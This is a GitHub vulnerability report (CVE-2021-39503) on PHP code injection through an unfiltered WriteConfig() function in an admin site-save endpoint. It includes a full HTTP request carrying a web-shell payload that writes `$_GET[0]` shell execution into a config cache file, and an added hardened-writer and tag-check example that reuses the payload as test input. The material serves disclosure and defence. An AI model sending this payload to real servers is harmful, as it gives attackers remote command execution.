PHP Code Execution via WriteConfig() function #15

Open
KietNA-68 opened this issue Aug 22, 2021 · 1 comment
KietNA-68 commented Aug 22, 2021

#Author: KietNA from 1nv1cta team, HPT CyberSecurity Center
#Submit date: 22/08/2021
#Condition: Admin user
#Version: v5.6
#Description:
Because the input filtering in the WriteConfig() function does not remove characters such as `<`, `>`, `?`, `=`, `` ` ``, ..., an attacker can inject PHP code into the /include/config.cache.php file. The attacker can append `?>` to close the PHP syntax and add a new PHP function.

In the /admin/site_save.php file:
(screenshot)

(screenshot)

WriteF() function:
(screenshot)

### PoC:
(screenshot)

In the config.cache.php file:
(screenshot)

Then go back to the .php files in the /admin/ directory to execute the code:
(screenshot)

### Request

```http
POST /admin/site_save.php HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Origin: http://172.16.0.12:2222
Connection: close
Referer: http://172.16.0.12:2222/admin/site_add.php
Cookie: PortalOpenEMR=BKEx0ZLJ9X41gReq-UHNt-aC0jHNPiQLUOf7FXckqCAumudg; OpenEMR=UwreHaTw9iqwJWXqAY3%2CWYkZgvA3wdVmymdC5QqiVC1H2scM; loader=loaded; admin_lang=cn; home_lang=cn; workspaceParam=users_index%7CMember; referurl=%2Findex.php%3Fm%3Duser%26c%3DUsers%26a%3Dcentre; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0; users_id=1; PHPSESSID=qhclrgdoah7rbv9l34fvj07h00
Upgrade-Insecure-Requests: 1

site_name=123&site_key=kietna?><?=`$_GET[0]`?><?&site_lang=testtest&webname=123&weburl=http%3A%2F%2F172.16.0.12%3A2222&webpath=123&webswitch=Y&action=add
```

### Response

```http
HTTP/1.1 200 OK
Date: Sun, 22 Aug 2021 07:54:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHP/7.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12942

<script type="text/javascript">window.top.location.reload();</script>
```
@KietNA-68 KietNA-68 changed the title PHP Code Execution via create new site function in site_save.php PHP Code Execution via WriteConfig() function Aug 22, 2021
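The report above does not include the project's WriteConfig() source, so the following is an added illustration, not code from the project: a hypothetical config writer that pastes a raw setting into generated PHP (the `#` comment-header pattern is an assumption chosen because `?>` inside a line comment ends PHP mode), the `var_export()` form that keeps every byte inside a string literal, and a tokenizer check that rejects any generated file containing extra PHP tags. Function names and the temp-file layout are assumptions.

```php
<?php
// Added example (not the reported project's code). A hypothetical config
// writer that pastes raw settings into generated PHP (unsafe), the
// var_export() form that keeps every byte inside a string literal, and a
// tokenizer check that rejects a generated file containing extra PHP tags.
declare(strict_types=1);

// Unsafe (assumed pattern): the value lands in a `#` comment, where `?>`
// ends PHP mode, so `<`, `>`, `?` and `=` in the value start new PHP code.
function writeConfigUnsafe(string $path, array $settings): void
{
    $php = "<?php\n# generated for site " . $settings['site_name']
         . " key " . $settings['site_key'] . "\n";
    $php .= '$config = ' . var_export($settings, true) . ";\n";
    file_put_contents($path, $php, LOCK_EX);
}

// Hardened: no interpolation at all; var_export() emits quoted, escaped
// literals, so a value can never leave its string.
function writeConfigSafe(string $path, array $settings): void
{
    $php = "<?php\n" . '$config = ' . var_export($settings, true) . ";\n";
    file_put_contents($path, $php, LOCK_EX);
}

// Defensive check for any generated config: exactly one open tag and no
// close tag, otherwise part of the data has become code.
function generatedConfigIsClean(string $path): bool
{
    $open = 0; $close = 0;
    foreach (token_get_all((string) file_get_contents($path)) as $t) {
        if (!is_array($t)) { continue; }
        if ($t[0] === T_OPEN_TAG || $t[0] === T_OPEN_TAG_WITH_ECHO) { $open++; }
        if ($t[0] === T_CLOSE_TAG) { $close++; }
    }
    return $open === 1 && $close === 0;
}

// Constructed input: the site_key value from the report's request.
$settings = ['site_name' => '123', 'site_key' => 'kietna?><?=`$_GET[0]`?><?'];
$unsafe = tempnam(sys_get_temp_dir(), 'cfg');
$safe   = tempnam(sys_get_temp_dir(), 'cfg');
writeConfigUnsafe($unsafe, $settings);
writeConfigSafe($safe, $settings);
var_dump(generatedConfigIsClean($unsafe)); // false: injected tags present
var_dump(generatedConfigIsClean($safe));   // true: value stayed a string
unlink($unsafe);
unlink($safe);
```

The check is independent of how the file was produced, so it can also run over an existing config.cache.php to detect a tampered cache.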
KietNA-68 commented Aug 26, 2021

CVE-2021-39503 has been assigned to me and [email protected].
Please fix it ASAP! Thank you very much @duyueping
